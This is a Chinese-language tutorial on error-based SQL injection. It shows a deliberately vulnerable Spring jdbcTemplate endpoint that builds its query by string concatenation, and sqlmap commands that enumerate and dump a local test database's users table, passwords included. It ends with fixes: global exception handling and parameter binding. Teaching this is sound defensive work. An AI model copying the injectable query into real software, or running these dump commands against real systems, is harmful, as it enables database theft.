SQL注入：基于错误

SQL注入：基于错误

攻击者通过在SQL中插入错误的语法，触发数据库错误，从错误消息中获取有关数据库结构和数据的信息。

1、先决条件

• 没有进行统一的异常处理，接口访问报错直接响应给客户端

• 采用jdbcTemplate 操作数据库

@PostMapping("wrong")
    public void wrong(@RequestParam("username") String username) {
        // 直接使用字符串拼接的方式
        log.info("{}", jdbcTemplate.queryForList("SELECT id,username FROM users WHERE username LIKE '%" + username + "%'"));
    }

2、使用sqlmap实现拖库

1、获取数据库名称

C:\Python310\sqlmap>python sqlmap.py -u  http://localhost:18081/error-based/wrong --data username=test --current-db --flush-session

.......中间直接输入y,继续向下

[18:29:55] [INFO] the back-end DBMS is MySQL
back-end DBMS: MySQL >= 5.6
[18:29:55] [INFO] fetching current database
[18:29:55] [INFO] retrieved: 'sqlinject'
current database: 'sqlinject'


C:\Python310\sqlmap>

current database后面的就是数据库的名称。

程序控制台提示：

java.sql.SQLSyntaxErrorException: FUNCTION sqlinject.AURORA_VERSION does not exist

2、获取库下面的表

C:\Python310\sqlmap>python sqlmap.py -u  http://localhost:18081/error-based/wrong --data username=test --tables -D "sqlinject"

[18:39:53] [INFO] the back-end DBMS is MySQL
back-end DBMS: MySQL >= 5.6
[18:39:53] [INFO] fetching tables for database: 'sqlinject'
[18:39:53] [WARNING] reflective value(s) found and filtering out
[18:39:53] [INFO] retrieved: 'userdata'
[18:39:53] [INFO] retrieved: 'users'
Database: sqlinject
[2 tables]
+----------+
| userdata |
| users    |
+----------+


C:\Python310\sqlmap

3、dump数据库表

C:\Python310\sqlmap>python sqlmap.py -u  http://localhost:18081/error-based/wrong --data username=test -D "sqlinject" -T "users" --dump
。。。。。。。。。。。。。。。。。。。。

Database: sqlinject
Table: users
[3 entries]
+----+----------+----------+
| id | password | username |
+----+----------+----------+
| 1  | haha1    | test1    |
| 2  | haha2    | test2    |
| 3  | 123456   | kevin    |
+----+----------+----------+

[18:42:35] [INFO] table 'sqlinject.users' dumped to CSV file 'C:\Users\admin\AppData\Local\sqlmap\output\localhost\dump\sqlinject\users.csv'

C:\Python310\sqlmap>

至此整个数据库的表数据就都拖过来了。可想而知这个SQL注入的危害。

3、补救措施

• 1、全局把异常捕获，不响应给客户端

@ExceptionHandler
    public void handle(HttpServletRequest req, HandlerMethod method, Exception ex) {
        log.warn(String.format("访问 %s -> %s 出现异常！", req.getRequestURI(), method.toString()), ex);
    }

这样在执行获取数据库名称就不能实现了

C:\Python310\sqlmap>python sqlmap.py -u  http://localhost:18081/error-based/wrong --data username=test --current-db --flush-session

[18:54:53] [INFO] testing 'Generic UNION query (NULL) - 1 to 10 columns'
[18:54:53] [WARNING] POST parameter 'username' does not seem to be injectable
[18:54:53] [CRITICAL] all tested parameters do not appear to be injectable. Try to increase values for '--level'/'--risk' options if you wish to perform more tests. If you suspect that there is some kind of protection mechanism involved (e.g. WAF) maybe you could try to use option '--tamper' (e.g. '--tamper=space2comment') and/or switch '--random-agent'

但是这样就完全可以解决问题了么？？，但是如果知道了数据库名称，表名这个时候还能不能拖库成功呢？这两种都是不可以的。但是这还不是最好的解决方法，应该使用参数绑定的方式解决。

• 2、使用参数绑定的方式

@PostMapping("right")
    public void right(@RequestParam("username") String username) {
      
        log.info("{}", jdbcTemplate.queryForList("SELECT id,username FROM users WHERE username LIKE ?", "%" + username + "%"));
    }